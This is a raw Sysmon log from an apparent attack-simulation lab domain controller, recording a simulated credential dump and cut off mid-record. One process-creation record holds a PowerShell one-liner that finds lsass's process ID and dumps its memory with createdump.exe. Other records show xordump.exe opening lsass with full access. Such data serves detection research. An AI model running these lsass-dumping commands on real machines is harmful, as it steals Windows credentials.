dll+51781 10341000x800000000000000025832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.520{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.457{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.457{4DB9351A-A345-60D3-6306-00000000CF01}36565804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb1147588
9\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000025824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.462{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\System32\tasklist.exe10.0.14393.0 (rs1_release.160715-1616)Lists the current running tasksMicrosoft® Windows® Operating SystemMicrosoft 
Corporationtasklist.exe"C:\Windows\system32\tasklist.exe"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=6F2FDCF651A1650FC7B4FC5A860E4D9D,SHA256=27EDDAC6A2E5A74DF67C534393B0B025B03D61310748BE016DCE348A02D30A22,IMPHASH=9C5CFDDF3336412B8046D54234415205{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \""Createdump Path C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" $LSASS = tasklist | findstr \""lsass\"" $FIELDS = $LSASS -split \""\s+\"" $ID = $FIELDS[1] & \""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" -u -f C:\Windows\Temp\dotnet-lsass.dmp $ID} 23542300x800000000000000025823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.374{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC1BEF343759DF9603F8BA5DE8572310,SHA256=5A9237C96BC99CD984367B1846EE17DCF3E9C669BE019E07382A7FA4ED5E6AF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.202{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.202{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.046{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.046{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.046{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6E9A10AAA63C03D067A7E0FA04D5FA9,SHA256=93472316855643FEFC19A186FD3501DECC020FED797C898251122D110080F9B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.936{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=61978826E66E6E9CF187C7137CDEA228,SHA256=DC54FA948B306B5D8B2FE87A4305518E27491065545FC51243EC5F6367CE68DC,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000026114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.467{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E12BEDA735D8C9FFCF7A752AC95ECEA8,SHA256=F9CED563DEB43B227A04F35A3A3B62BDE5D11D29BEABD5839FA587E1A6E8CFD3,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000026113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.490{4DB9351A-A345-60D3-6206-00000000CF01}6784raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000026112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.332{4DB9351A-A347-60D3-6806-00000000CF01}29321420C:\Windows\Temp\xordump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\Windows\Temp\xordump.exe+688be 10341000x800000000000000026111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.328{4DB9351A-A347-60D3-6806-00000000CF01}29321420C:\Windows\Temp\xordump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Temp\xordump.exe+688be 23542300x800000000000000026110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:31.316{4DB9351A-A347-60D3-6706-00000000CF01}5864ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000026107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-A347-60D3-6706-00000000CF01}58642452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9d176dc9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb4f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb1147
5889\System.Management.Automation.ni.dll+9c5eb12d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9d0c218b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5a809f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c60bb11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5edb20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5edb20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5ed9b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5de6d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5ebc13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb4f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb12d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9d0c218b(wow64)|C:\Windows\a